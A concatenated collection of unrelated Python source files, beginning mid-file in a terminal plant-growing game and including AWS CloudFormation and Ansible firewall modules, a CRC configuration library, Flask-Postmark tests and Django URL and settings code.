"You wonder what kind of plant your seed will grow into.",
"You're ready for a new start with this plant.",
"You're tired of waiting for your seed to grow.",
"You wish your seed could tell you what it needs.",
"You can feel the spirit inside your seed.",
"These pretzels are making you thirsty.",
"Way to plant, Ann!",
"'To see things in the seed, that is genius' - Lao Tzu",
],
1:[
"The seedling fills you with hope.",
"The seedling shakes in the wind.",
"You can make out a tiny leaf - or is that a thorn?",
"You can feel the seedling looking back at you.",
"You blow a kiss to your seedling.",
"You think about all the seedlings who came before it.",
"You and your seedling make a great team.",
"Your seedling grows slowly and quietly.",
"You meditate on the paths your plant's life could take.",
],
2:[
"The " + this_species + " makes you feel relaxed.",
"You sing a song to your " + this_species + ".",
"You quietly sit with your " + this_species + " for a few minutes.",
"Your " + this_species + " looks pretty good.",
"You play loud techno to your " + this_species + ".",
"You play piano to your " + this_species + ".",
"You play rap music to your " + this_species + ".",
"You whistle a tune to your " + this_species + ".",
"You read a poem to your " + this_species + ".",
"You tell a secret to your " + this_species + ".",
"You play your favorite record for your " + this_species + ".",
],
3:[
"Your " + this_species + " is growing nicely!",
"You're proud of the dedication it took to grow your " + this_species + ".",
"You take a deep breath with your " + this_species + ".",
"You think of all the words that rhyme with " + this_species + ".",
"The " + this_species + " looks full of life.",
"The " + this_species + " inspires you.",
"Your " + this_species + " makes you forget about your problems.",
"Your " + this_species + " gives you a reason to keep going.",
"Looking at your " + this_species + " helps you focus on what matters.",
"You think about how nice this " + this_species + " looks here.",
"The buds of your " + this_species + " might bloom soon.",
],
4:[
"The " + this_color + " flowers look nice on your " + this_species +"!",
"The " + this_color + " flowers have bloomed and fill you with positivity.",
"The " + this_color + " flowers remind you of your childhood.",
"The " + this_color + " flowers remind you of spring mornings.",
"The " + this_color + " flowers remind you of a forgotten memory.",
"The " + this_color + " flowers remind you of your happy place.",
"The aroma of the " + this_color + " flowers energize you.",
"The " + this_species + " has grown beautiful " + this_color + " flowers.",
"The " + this_color + " petals remind you of that favorite shirt you lost.",
"The " + this_color + " flowers remind you of your crush.",
"You smell the " + this_color + " flowers and are filled with peace.",
],
5:[
"You fondly remember the time you spent caring for your " + this_species + ".",
"Seed pods have grown on your " + this_species + ".",
"You feel like your " + this_species + " appreciates your care.",
"The " + this_species + " fills you with love.",
"You're ready for whatever comes after your " + this_species + ".",
"You're excited to start growing your next plant.",
"You reflect on when your " + this_species + " was just a seedling.",
"You grow nostalgic about the early days with your " + this_species + ".",
],
99:[
"You wish you had taken better care of your plant.",
"If only you had watered your plant more often..",
"Your plant is dead, there's always next time.",
"You cry over the withered leaves of your plant.",
"Your plant died. Maybe you need a fresh start.",
],
}
# self.life_stages is tuple containing length of each stage
# (seed, seedling, young, mature, flowering)
if this_plant.dead:
this_stage = 99
this_stage_descriptions = stage_descriptions[this_stage]
description_num = random.randint(0,len(this_stage_descriptions) - 1)
# If not fully grown
if this_stage <= 4:
# Growth hint
if this_stage >= 1:
last_growth_at = this_plant.life_stages[this_stage - 1]
else:
last_growth_at = 0
ticks_since_last = this_plant.ticks - last_growth_at
ticks_between_stage = this_plant.life_stages[this_stage] - last_growth_at
if ticks_since_last >= ticks_between_stage * 0.8:
output_text += "You notice your plant looks different.\n"
output_text += this_stage_descriptions[description_num] + "\n"
# if seedling
if this_stage == 1:
species_options = [this_plant.species_dict[this_plant.species],
this_plant.species_dict[(this_plant.species+3) % len(this_plant.species_dict)],
this_plant.species_dict[(this_plant.species-3) % len(this_plant.species_dict)]]
random.shuffle(species_options)
plant_hint = "It could be a(n) " + species_options[0] + ", " + species_options[1] + ", or " + species_options[2]
output_text += plant_hint + ".\n"
# if young plant
if this_stage == 2:
if this_plant.rarity >= 2:
rarity_hint = "You feel like your plant is special."
output_text += rarity_hint + ".\n"
# if mature plant
if this_stage == 3:
color_options = [this_plant.color_dict[this_plant.color],
this_plant.color_dict[(this_plant.color+3) % len(this_plant.color_dict)],
this_plant.color_dict[(this_plant.color-3) % len(this_plant.color_dict)]]
random.shuffle(color_options)
plant_hint = "You can see the first hints of " + color_options[0] + ", " + color_options[1] + ", or " + color_options[2]
output_text += plant_hint + ".\n"
return output_text
def draw_plant_description(self, this_plant):
# If menu is currently showing something other than the description
self.clear_info_pane()
if self.infotoggle != 1:
# get plant description before printing
output_string = self.get_plant_description(this_plant)
growth_multiplier = 1 + (0.2 * (this_plant.generation-1))
output_string += "Generation: {}\nGrowth rate: {}".format(self.plant.generation, growth_multiplier)
self.draw_info_text(output_string)
self.infotoggle = 1
else:
# otherwise just set toggle
self.infotoggle = 0
def draw_instructions(self):
# Draw instructions on screen
self.clear_info_pane()
if self.infotoggle != 4:
instructions_txt = ("welcome to botany. you've been given a seed\n"
"that will grow into a beautiful plant. check\n"
"in and water your plant every 24h to keep it\n"
"growing. 5 days without water = death. your\n"
"plant depends on you to live! more info is\n"
"available in the readme :)\n"
" cheers,\n"
" curio\n"
)
self.draw_info_text(instructions_txt)
self.infotoggle = 4
else:
self.infotoggle = 0
def clear_info_pane(self):
# Clears bottom part of screen
clear_bar = " " * (self.maxx-2) + "\n"
clear_block = clear_bar * (self.maxy - 15)
for y, line in enumerate(clear_block.splitlines(), 2):
self.screen.addstr(y+12, 2, line, curses.A_NORMAL)
self.screen.refresh()
def draw_info_text(self, info_text):
# print lines of text to info pane at bottom of screen
if type(info_text) is str:
info_text = info_text.splitlines()
for y, line in enumerate(info_text, 2):
self.screen.addstr(y+12, 2, line, curses.A_NORMAL)
self.screen.refresh()
def harvest_confirmation(self):
self.clear_info_pane()
# get plant description before printing
max_stage = len(self.plant.stage_dict) - 1
harvest_text = ""
if not self.plant.dead:
if self.plant.stage == max_stage:
harvest_text += "Congratulations! You raised your plant to its final stage of growth.\n"
harvest_text += "Your next plant will grow at a speed of: {}x\n".format(1 + (0.2 * self.plant.generation))
harvest_text += "If you harvest your plant you'll start over from a seed.\nContinue? (Y/n)"
self.draw_info_text(harvest_text)
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
if user_in in [ord('Y'), ord('y')]:
self.plant.start_over()
else:
pass
self.clear_info_pane()
def handle_request(self, request):
# Menu options call functions here
if request == None: return
if request == "harvest":
self.harvest_confirmation()
if request == "water":
self.plant.water()
if request == "look":
try:
self.draw_plant_description(self.plant)
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "instructions":
try:
self.draw_instructions()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "garden":
try:
self.draw_garden()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "set score to 9000":
self.plant.ticks = 9000
if request == "grow plant 1 stage":
oldstage = self.plant.stage
self.plant.growth()
if overflow and self.plant.stage == oldstage:
self.plant.stage += 1
if request == "bring plant back from the dead":
self.plant.dead = False
self.plant.watered_timestamp = time.time()
def __exit__(self):
self.exit = True
curses.curs_set(2)
curses.endwin()
os.system('clear')
|
from __future__ import print_function
from cfn_pyplates import functions
import respawn
import sys
def standardize_refs(d):
"""
Recursively transform all ref's and get_att's in dictionary to CloudFormation references.
"""
for k, v in d.iteritems():
if isinstance(v, dict):
standardize_refs(v)
elif isinstance(v, list):
for i in range(len(v)):
if isinstance(v[i], dict):
standardize_refs(v[i])
elif isinstance(v[i], str):
v[i] = transform_reference(v[i])
elif isinstance(v, str):
d[k] = transform_reference(v)
def transform_reference(v):
"""
Transform ref and ref_att in dictionary to CloudFormation ref or get_att
"""
if v.startswith('ref('):
v = v[len('ref('):-1].strip()
v = functions.ref(v)
elif v.startswith('get_att('):
v = [s.strip() for s in v[len('get_att('):-1].split(',')]
v = functions.get_att(v[0], v[1])
return v
resources = dict()
cft = respawn.cloudformation.Template(**options)
standardize_refs(options)
try:
if 'load_balancers' in options:
for name, lb_opts in options['load_balancers'].items():
lb = cft.add_load_balancer(name, **lb_opts)
resources[name] = lb
except Exception as e:
raise RuntimeError("Required arguments missing from Load Balancer: {0}: Exception: {1}".format(name, e))
try:
if 'instances' in options:
for name, instance_opts in options['instances'].items():
resources[name] = cft.add_instance(name, **instance_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Instance. Exception: {0}: Exception: {1}".format(name, e))
try:
if 'volumes' in options:
volumes = options['volumes']
for name, volume_opts in volumes.items():
resources[name] = cft.add_volume(name, **volume_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Volume. Exception: {0}: Exception: {1}".format(name, e))
try:
if 'auto_scale_groups' in options:
auto_scale_groups = options['auto_scale_groups']
for name, asg_opts in auto_scale_groups.items():
resources[name] = cft.add_autoscaling_group(name, **asg_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Autoscaling Group: {0}: Exception: {1}".format(name, e))
try:
if 'launch_configurations' in options:
launch_configurations = options['launch_configurations']
for name, lc_opts in launch_configurations.items():
resources[name] = cft.add_launch_config(name, **lc_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Launch Configuration: {0}: Exception: {1}".format(name, e))
try:
if 'scheduled_actions' in options:
scheduled_actions = options['scheduled_actions']
for name, sa_opts in scheduled_actions.items():
resources[name] = cft.add_scheduled_action(name, **sa_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Scheduled Action: {0}: Exception: {1}".format(name, e))
try:
if 'lifecycle_hooks' in options:
lifecycle_hooks = options['lifecycle_hooks']
for name, lh_opts in lifecycle_hooks.items():
resources[name] = cft.add_lifecycle_hook(name, **lh_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Lifecycle Hook: {0}: Exception: {1}".format(name, e))
try:
if 'rds' in options:
rds = options['rds']
for name, rds_opts in rds.items():
resources[name] = cft.add_rds_instance(name, **rds_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from RDS: {0}: Exception: {1}".format(name, e))
try:
if 'cloud_watch' in options:
for name, cloud_watch_opts in options['cloud_watch'].items():
resources[name] = cft.add_cloud_watch_alarm(name, **cloud_watch_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Cloud Watch: {0}: Exception: {1}".format(name, e))
try:
if 'network_interfaces' in options:
for name, network_interface_opts in options['network_interfaces'].items():
resources[name] = cft.add_network_interface(name, **network_interface_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Network Interface: {0}: Exception: {1}".format(name, e))
try:
if 'network_interface_attachments' in options:
for name, nia_opts in options['network_interface_attachments'].items():
resources[name] = cft.add_network_interface_attachment(name, **nia_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Network Interface Attachment: {0}: Exception: {1}".format(name, e))
try:
if 'security_group' in options:
for name, sg_opts in options['security_group'].items():
resources[name] = cft.add_security_group(name, **sg_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Security Group: {0}: Exception: {1}".format(name, e))
try:
if 'parameters' in options:
for name, parameter_opts in options['parameters'].items():
cft.add_parameter(name, **parameter_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from Parameters")
try:
if 'sns_topics' in options:
for name, sns_opts in options['sns_topics'].items():
resources[name] = cft.add_sns_topic(name, **sns_opts)
except Exception as e:
raise RuntimeError("Required arguments missing from SNS Topic: {0}: Exception: {1}".format(name, e))
try:
if 'record_set' in options:
for name, values in options['record_set'].items():
resources[name] = cft.add_route53_record_set(name, **values)
except Exception as e:
raise RuntimeError("Required arguments missing from SNS Topic. Exception: ", e)
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_ipsec_ipv4_proxyid
short_description: Configures IPv4 Proxy Id on an IPSec Tunnel
author: "Heiko Burghardt (@odysseus107)"
version_added: "2.8"
requirements:
- pan-python can be obtained from PyPI U(https://pypi.python.org/pypi/pan-python)
- pandevice can be obtained from PyPI U(https://pypi.python.org/pypi/pandevice)
notes:
- Panorama is supported.
- Check mode is supported.
extends_documentation_fragment:
- panos.transitional_provider
- panos.state
- panos.full_template_support
options:
name:
description:
- The Proxy ID
required: true
tunnel_name:
description:
- IPSec Tunnel Name
required: true
local:
description:
- IP subnet or IP address represents the local network
required: true
remote:
description:
- IP subnet or IP address represents the remote network
required: true
any_protocol:
description:
- Any protocol boolean
default: True
type: bool
number_proto:
description:
- Numbered Protocol: protocol number (1-254)
type: int
tcp_local_port:
description:
- Protocol TCP: local port
type: int
tcp_remote_port:
description:
- Protocol TCP: remote port
type: int
udp_local_port:
description:
Protocol UDP: local port
type: int
udp_remote_port:
description:
- Protocol UDP: remote port
type: int
commit:
description:
- Commit configuration if changed.
default: True
type: bool
'''
EXAMPLES = '''
- name: Add IPSec IPv4 Proxy ID
panos_ipsec_ipv4_proxyid:
provider: '{{ provider }}'
name: 'IPSec-ProxyId'
tunnel_name: 'Default_Tunnel'
local: '192.168.2.0/24'
remote: '192.168.1.0/24'
commit: False
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.panos.panos import get_connection
try:
from pandevice.network import IpsecTunnel
from pandevice.network import IpsecTunnelIpv4ProxyId
from pandevice.errors import PanDeviceError
except ImportError:
pass
def main():
helper = get_connection(
template=True,
template_stack=True,
with_classic_provider_spec=True,
with_state=True,
argument_spec=dict(
name=dict(
type='str', required=True,
help='The Proxy ID'),
tunnel_name=dict(
default='default',
help='The IPSec Tunnel Name'),
local=dict(
default='192.168.2.0/24',
help='IP subnet or IP address represents the local network'),
remote=dict(
default='192.168.1.0/24',
help='IP subnet or IP address represents the remote network'),
any_protocol=dict(
type='bool', default=True,
help='Any protocol boolean'),
number_proto=dict(
type='int',
help='Numbered Protocol: protocol number (1-254)'),
tcp_local_port=dict(
type='int',
help='Protocol TCP: local port'),
tcp_remote_port=dict(
type='int',
help='Protocol TCP: remote port'),
udp_local_port=dict(
type='int',
help='Protocol UDP: local port'),
udp_remote_port=dict(
type='int',
help='Protocol UDP: remote port'),
commit=dict(
type='bool', default=True,
help='Commit configuration if changed'),
)
)
module = AnsibleModule(
argument_spec=helper.argument_spec,
supports_check_mode=True,
required_one_of=helper.required_one_of
)
# Object specifications
spec = {
'name': module.params['name'],
'local': module.params['local'],
'remote': module.params['remote'],
'any_protocol': module.params['any_protocol'],
'number_protocol': module.params['number_proto'],
'tcp_local_port': module.params['tcp_local_port'],
'tcp_remote_port': module.params['tcp_remote_port'],
'udp_local_port': module.params['udp_local_port'],
'udp_remote_port': module.params['udp_remote_port'],
}
# Additional infos
commit = module.params['commit']
# Verify libs are present, get parent object.
parent = helper.get_pandevice_parent(module)
tunnel_name = module.params['tunnel_name']
# get the tunnel object
tunnel = IpsecTunnel(tunnel_name)
parent.add(tunnel)
try:
tunnel.refresh()
except PanDeviceError as e:
module.fail_json(msg='Failed refresh: {0}'.format(e))
# get the listing
listing = tunnel.findall(IpsecTunnelIpv4ProxyId)
obj = IpsecTunnelIpv4ProxyId(**spec)
tunnel.add(obj)
# Apply the state.
changed = helper.apply_state(obj, listing, module)
# Commit.
if commit and changed:
helper.commit(module)
# Done.
module.exit_json(changed=changed)
if __name__ == '__main__':
main()
|
import os
option = input("Build options: win32, win64, osx, linux, linux64, enter your option: \n")
buildpath = "";
if(option == "win64"):
option = "-buildWindows64Player";
buildpath = "WIN_Build\\KaziJump.exe";
os.popen("\"C:\\Program Files\\Unity 5.6.0b3\\Editor\\Unity.exe\" -batchmode " + option + "builds\\" + buildpath)
|
"""
Just to check
"""
def add(a, b):
"""
>>> add(2, 2)
4
>>> add(2, -2)
0
"""
return a + b
if __name__ == "__main__":
a = 5
b = 6
print(f"The sum of {a} + {b} is {add(a, b)}")
|
""" Program version information.
"""
import sys
DEBUGGING = False
PROGRAM_NAME = 'astviewer'
PROGRAM_VERSION = '1.1.2'
PYTHON_VERSION = "%d.%d.%d" % (sys.version_info[0:3])
|
from helpers import cache
@cache
def powers(n):
result = set()
for a in range(2, n+1):
for b in range(2, n+1):
result.add(pow(a, b))
return result
n = 100
print len(powers(n))
|
from sqlalchemy.orm.exc import NoResultFound
import io
import sys
sys.path.append("models/")
from ModelBase import SessionFactory
from Twitter_User import Twitter_User
from sqlalchemy import or_
import logging
class setTargetUsers(object):
def parseparams(self, argv):
pc = 0
while(pc < len(argv)):
param = argv[pc]
if param == '-f':
pc += 1
self.filename = argv[pc]
pc += 1
def usage(self, argv):
print "USAGE: python %s -f <userids file> -b <authenticated bot alias> -s [Optional] <starting with user id>"%(argv[0])
def __init__(self, argv):
self.parseparams(argv)
def run(self, batchSize=1000):
session = SessionFactory()
count = 0
print("running process")
# first set all istargets to false
for user in session.query(Twitter_User).filter(or_(
Twitter_User.istarget, Twitter_User.istarget == None)):
user.istarget = False
count += 1
if (count % batchSize) == 0:
print("commit 1")
session.commit()
toChange = set([line.strip()
for line in io.open(self.filename).readlines()])
for id in toChange:
try:
user = session.query(Twitter_User).filter(
Twitter_User.uid == id).one()
except NoResultFound:
logging.info('user id not found:%s' % id)
user.istarget = True
## for user in session.query(Twitter_User).filter(
## str(Twitter_User.uid) in toChange):
## user.istarget = True
## count += 1
## if (count % batchSize) == 0:
## session.commit()
session.commit()
print("help")
setTargetUsers(sys.argv).run()
|
"""
Local Authorities downloader class
"""
import logging
import os
import re
import requests
from ..caches.s3_cache import S3Cache
from ..caches.filesystem_cache import FilesystemCache
from ..caches.multi_level_caching_strategy import MultiLevelCachingStrategy
from ..downloaders.download_manager import DownloadManager
from .http import HttpDownloader
log = logging.getLogger(__name__)
class LocalAuthoritiesDownloader():
def _index_url(self):
return os.environ.get('LOCAL_AUTHORITIES_INDEX_URL',
("http://geoportal.statistics.gov.uk/geoportal/"
"rest/find/document?searchText="
"Local%20Authority%20Districts%20UK&f=pjson"))
def _get_latest_file_url(self):
index = requests.get(self._index_url()).json()
la_records = filter(
self._is_uk_local_authorities_list, index['records'])
newest_record = sorted(
la_records, key=self._year_from_title, reverse=True)[0]
return filter(self._is_file_link, newest_record['links'])[0]
def _is_file_link(self, link):
return link['type'] == 'open'
def _is_uk_local_authorities_list(self, record):
title = record['title'].lower()
pattern = 'local authority districts \(uk\) .* names and codes'
return re.search(pattern, title)
def _year_from_title(self, record):
pattern = ('local authority districts \(uk\)'
'.*([0-9]+).* names and codes')
return re.sub(pattern, '\1', record['title'])
def __init__(self, *args, **kwargs):
self.dest_dir = kwargs.pop('destination_dir', '/tmp/local_authorities')
self.cache_key = 'local-authorities-names-to-codes'
def download(self, dest_dir):
url = self._get_latest_file_url()['href']
dl_mgr = DownloadManager(
destination_dir=dest_dir,
downloader=HttpDownloader(url),
caching_strategy=self._caching_strategy())
return dl_mgr.download(url=url)
def _caching_strategy(self):
caches = [
FilesystemCache(dir='/tmp/local_authorities'),
S3Cache()
]
return MultiLevelCachingStrategy(caches=caches)
|
"""
Library of common CRC configurations
:note: POLY is the polynome of CRC and specifies which bits
should be xored together.
:note: WIDTH - specifies the width of CRC state/value
:note: REFIN - If it is True the bits in each byte are reversed before processing.
:note: REFOUT If it is set to FALSE, the
final value in the register is fed into the XOROUT stage directly,
otherwise, if this parameter is TRUE, the final register value is
reflected first.
:note: XOROUT This is an WIDTH-bit value. It is XORed to the final register value
(after the REFOUT) stage before the value is returned as the official
checksum.
:note: http://reveng.sourceforge.net/crc-catalogue/all.htm
:note: https://github.com/nanpuyue/crc/blob/master/CRC.txt
"""
class CRC_POLY:
"""
Base class for crc configuration specifications
"""
POLY = None
WIDTH = None
INIT = 0
REFIN = False
REFOUT = False
XOROUT = 0
class CRC_1(CRC_POLY):
"""
also known as parity bit
"""
POLY = 0x1
WIDTH = 1
class CRC_3_GSM(CRC_POLY):
"""
Used in mobile networks
"""
INIT = 0x0
POLY = 0x3
XOROUT = 0x07
WIDTH = 3
class CRC3_ROHC(CRC_POLY):
"CRC-3/ROHC (Robust header compression rfc3095)"
WIDTH = 3
POLY = 0x03
INIT = 0x07
REFIN = True
REFOUT = True
CHECK = 0x6
RESIDUE = 0x0
class CRC_4_ITU(CRC_POLY):
"""
G.704
"""
POLY = 0x3
WIDTH = 4
REFIN = True
REFOUT = True
CHECK = 0x7
RESIDUE = 0x0
class CRC_5_EPC(CRC_POLY):
"""
Gen 2 RFID EPC-C1G2
"""
POLY = 0x09
WIDTH = 5
CHECK = 0x00
RESIDUE = 0x00
class CRC_5_ITU(CRC_POLY):
"""
G.704
"""
POLY = 0x15
WIDTH = 5
class CRC_5_USB(CRC_POLY):
"""
USB token packets
"""
CHECK = 0x19
INIT = 0b11111
REFIN = True
REFOUT = True
RESIDUE = 0b01100
POLY = 0x05
WIDTH = 5
XOROUT = 0x1f
class CRC_6_CDMA2000_A(CRC_POLY):
"Used in mobile networks"
POLY = 0x27
WIDTH = 6
class CRC_6_CDMA2000_B(CRC_POLY):
"Used in mobile networks"
POLY = 0x07
WIDTH = 6
class CRC_6_DARC(CRC_POLY):
"Data Radio Channel"
POLY = 0x19
WIDTH = 6
class CRC_6_GSM(CRC_POLY):
"Used in mobile networks"
POLY = 0x2F
WIDTH = 6
class CRC_6_ITU(CRC_POLY):
"Used in G.704"
POLY = 0x03
WIDTH = 6
class CRC_7(CRC_POLY):
"Used in telecom systems, G.707,G.832, MMC, SD"
POLY = 0x09
WIDTH = 7
class CRC_7_MVB(CRC_POLY):
"Used in Train Communication Network, IEC 60870-5"
POLY = 0x65
WIDTH = 7
class CRC_8(CRC_POLY):
"Used in DVB-S2"
POLY = 0xD5
WIDTH = 8
class CRC_8_AUTOSAR(CRC_POLY):
"Used in automotive integration, OpenSafety"
POLY = 0x2F
WIDTH = 8
class CRC_8_Bluetooth(CRC_POLY):
"Used in wireless connectivity"
POLY = 0xA7
WIDTH = 8
class CRC_8_CCITT(CRC_POLY):
"Used in I.432.1; ATM HEC, ISDN HEC and cell delineation"
CHECK = 0xf4
POLY = 0x07
WIDTH = 8
RESIDUE = 0x00
class CRC_8_Dallas_Maxim(CRC_POLY):
"Used in 1-Wire bus"
POLY = 0x31
WIDTH = 8
class CRC_8_DARC(CRC_POLY):
"Used in Data Radio Channel"
POLY = 0x39
WIDTH = 8
class CRC_8_GSM_B(CRC_POLY):
"Used in mobile networks"
POLY = 0x49
WIDTH = 8
class CRC_8_SAE_J1850(CRC_POLY):
"Used in AES3"
POLY = 0x1D
WIDTH = 8
class CRC_8_WCDMA(CRC_POLY):
"Used in mobile networks"
CHECK = 0x25
INIT = 0X00
POLY = 0x9B
REFIN = True
REFOUT = True
RESIDUE = 0x00
WIDTH = 8
class CRC_10(CRC_POLY):
"Used in ATM; I.610"
POLY = 0x233
WIDTH = 10
class CRC_10_CDMA2000(CRC_POLY):
"Used in mobile networks"
POLY = 0x3D9
WIDTH = 10
class CRC_10_GSM(CRC_POLY):
"Used in mobile networks"
POLY = 0x175
WIDTH = 10
class CRC_11(CRC_POLY):
"Used in FlexRay"
POLY = 0x385
WIDTH = 11
class CRC_12(CRC_POLY):
"Used in telecom systems"
POLY = 0x80F
WIDTH = 12
class CRC_12_CDMA2000(CRC_POLY):
"Used in mobile networks"
POLY = 0xF13
WIDTH = 12
class CRC_12_GSM(CRC_POLY):
"Used in mobile networks"
POLY = 0xD31
WIDTH = 12
class CRC_13_BBC(CRC_POLY):
"Used in Time signal, Radio teleswitch"
POLY = 0x1CF5
WIDTH = 13
class CRC_14_DARC(CRC_POLY):
"Used in Data Radio Channel[19]"
POLY = 0x0805
WIDTH = 14
class CRC_14_GSM(CRC_POLY):
"Used in mobile networks"
POLY = 0x202D
WIDTH = 14
class CRC_15_CAN(CRC_POLY):
POLY = 0x4599
WIDTH = 15
class CRC_15_MPT1327(CRC_POLY):
POLY = 0x6815
WIDTH = 15
class CRC_16_Chakravarty(CRC_POLY):
"Used in Optimal for payloads ≤64 bits"
POLY = 0x2F15
WIDTH = 16
class CRC_16_ARINC(CRC_POLY):
"Used in ACARS applications"
POLY = 0xA02B
WIDTH = 16
class CRC_16_CCITT(CRC_POLY):
"""
Used in X.25, V.41, HDLC FCS, XMODEM, Bluetooth, PACTOR, SD, DigRF, many others;
Also known as CRC_CCITT
"""
INIT = 0xFFFF
POLY = 0x1021
WIDTH = 16
class CRC_16_CDMA2000(CRC_POLY):
"Used in mobile networks"
POLY = 0xC867
WIDTH = 16
class CRC_16_DECT(CRC_POLY):
"Used in cordless telephones"
POLY = 0x0589
WIDTH = 16
class CRC_16_T10_DIF(CRC_POLY):
"Used in SCSI DIF"
POLY = 0x8BB7
WIDTH = 16
class CRC_16_DNP(CRC_POLY):
"Used in DNP, IEC 870, M-Bus"
POLY = 0x3D65
WIDTH = 16
class CRC_16_IBM(CRC_POLY):
"""
Used in Bisync, Modbus, ANSI X3.28, SIA DC-07, many others;
Also known as CRC_16 and CRC_16-ANSI
"""
POLY = 0x8005
REFIN = True
REFOUT = True
WIDTH = 16
class CRC_16_USB:
POLY=0x8005
INIT=0XFFFF
REFIN=True
REFOUT=True
XOROUT=0XFFFF
CHECK=0XB4C8
RESIDUE=0XB001
WIDTH=16
class CRC_16_OpenSafety_A(CRC_POLY):
"Used in safety fieldbus"
POLY = 0x5935
WIDTH = 16
class CRC_16_OpenSafety_B(CRC_POLY):
"Used in safety fieldbus"
POLY = 0x755B
WIDTH = 16
class CRC_16_Profibus(CRC_POLY):
"Used in fieldbus networks"
POLY = 0x1DCF
WIDTH = 16
class CRC_17_CAN(CRC_POLY):
"Used in CAN FD"
POLY = 0x1685B
WIDTH = 17
class CRC_21_CAN(CRC_POLY):
"Used in CAN FD"
POLY = 0x102899
WIDTH = 21
class CRC_24(CRC_POLY):
"Used in FlexRay"
POLY = 0x5D6DCB
WIDTH = 24
class CRC_24_Radix_64(CRC_POLY):
"Used in OpenPGP, RTCM104v3"
POLY = 0x864CFB
WIDTH = 24
class CRC_30(CRC_POLY):
"Used in CDMA"
POLY = 0x2030B9C7
WIDTH = 30
class CRC_32(CRC_POLY):
"""
Used in HDLC, ANSI X3.66, ITU-T V.42, Ethernet, Serial ATA,
MPEG-2, PKZIP, Gzip, Bzip2, PNG, many others
"""
INIT = 0xffffffff
POLY = 0x04C11DB7
RESIDUE = 0xC704DD7B # CBF43926
REFIN = True
REFOUT = True
WIDTH = 32
XOROUT = 0xffffffff
class CRC_32C(CRC_POLY):
"Used in (Castagnoli), iSCSI, SCTP, G.hn payload, SSE4.2, Btrfs, ext4, Ceph"
INIT = 0Xffffffff
CHECK = 0xe3069283
POLY = 0x1EDC6F41
WIDTH = 32
REFIN = True
REFOUT = True
RESIDUE = 0xb798b438
XOROUT = 0xffffffff
class CRC_32K(CRC_POLY):
"Koopman {1,3,28}"
POLY = 0x741B8CD7
WIDTH = 32
class CRC_32K_2(CRC_POLY):
"Koopman {1,1,30}"
POLY = 0x32583499
WIDTH = 32
class CRC_32Q(CRC_POLY):
"Used in aviation; AIXM"
POLY = 0x814141AB
WIDTH = 32
class CRC_40_GSM(CRC_POLY):
"Used in GSM control channel[40][41]"
POLY = 0x0004820009
WIDTH = 40
class CRC_64_ECMA(CRC_POLY):
"Used in ECMA-182, XZ Utils"
POLY = 0x42F0E1EBA9EA3693
WIDTH = 64
class CRC_64_ISO(CRC_POLY):
"Used in HDLC, Swiss-Prot/TrEMBL; considered weak for hashing"
POLY = 0x000000000000001B
WIDTH = 64
|
import pytest
from flask_postmark import Postmark
BODY = "<html><body><strong>Hello</strong> dear Postmark user.</body></html>"
SUBJECT = "Postmark test"
RECEIVER = "receiver@example.com"
SENDER = "sender@example.com"
DATA = {"From": SENDER, "To": RECEIVER, "Subject": SUBJECT, "HtmlBody": BODY}
def test_token(test_client, server_token):
assert test_client.get("/token").data == server_token
def test_send(post):
assert post("/send", DATA) == {
"Attachments": [],
"Bcc": None,
"Cc": None,
"From": SENDER,
"Headers": [],
"HtmlBody": BODY,
"Metadata": None,
"Tag": None,
"TextBody": None,
"To": RECEIVER,
"TrackLinks": "None",
"TrackOpens": None,
"ReplyTo": None,
"Subject": SUBJECT,
}
def test_send_batch(post):
data = post("/send_batch", [DATA, DATA])
expected = {
"Attachments": [],
"From": SENDER,
"Headers": [],
"Subject": SUBJECT,
"HtmlBody": BODY,
"To": RECEIVER,
}
assert data == [expected, expected]
def test_is_same_client(post):
assert post("/is_same_client", DATA) is True
def test_empty_app(app):
assert len(app.teardown_appcontext_funcs) == 1
postmark = Postmark()
postmark.init_app(app)
assert len(app.teardown_appcontext_funcs) == 2
def test_get_app(app):
postmark = Postmark(app)
assert postmark._get_app() is app
def test_no_context(app):
postmark = Postmark(app)
with pytest.raises(RuntimeError):
postmark.client
def test_teardown(app):
postmark = Postmark(app)
assert postmark.teardown(None) is None
|
from django.conf.urls import patterns, url
from bento.views import connexion, deconnexion, inscription, Recettes, ajoutrecette, modifier, VoirRecette, commenter, \
supprimer, voter
urlpatterns = patterns('',
url(r'^$', Recettes.as_view(), name='index'),
url(r'^index$', Recettes.as_view(), name='index'),
url(r'^index/(?P<type>\d+)$', Recettes.as_view(), name='index'),
url(r'^index/(?P<args>\w+)$', Recettes.as_view(), name='index'),
url(r'^connexion$', connexion, name='connexion'),
url(r'^deconnexion$', deconnexion, name='deconnexion'),
url(r'^inscription$', inscription, name='inscription'),
url(r'^ajouter', ajoutrecette, name='ajouter'),
url(r'^recette/(?P<slug>[\w-]+)$', VoirRecette.as_view(), name='recette'),
url(r'^modifier/(?P<slug>[\w-]+)$', modifier, name='modifier'),
url(r'^voter/(?P<slug>[\w-]+)$', voter, name='voter'),
url(r'^commenter/(?P<slug>[\w-]+)$', commenter, name='commenter'),
url(r'^supprimer/(?P<slug>[\w-]+)$', supprimer, name='supprimer'),
)
|
"""
Django settings for impulse project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
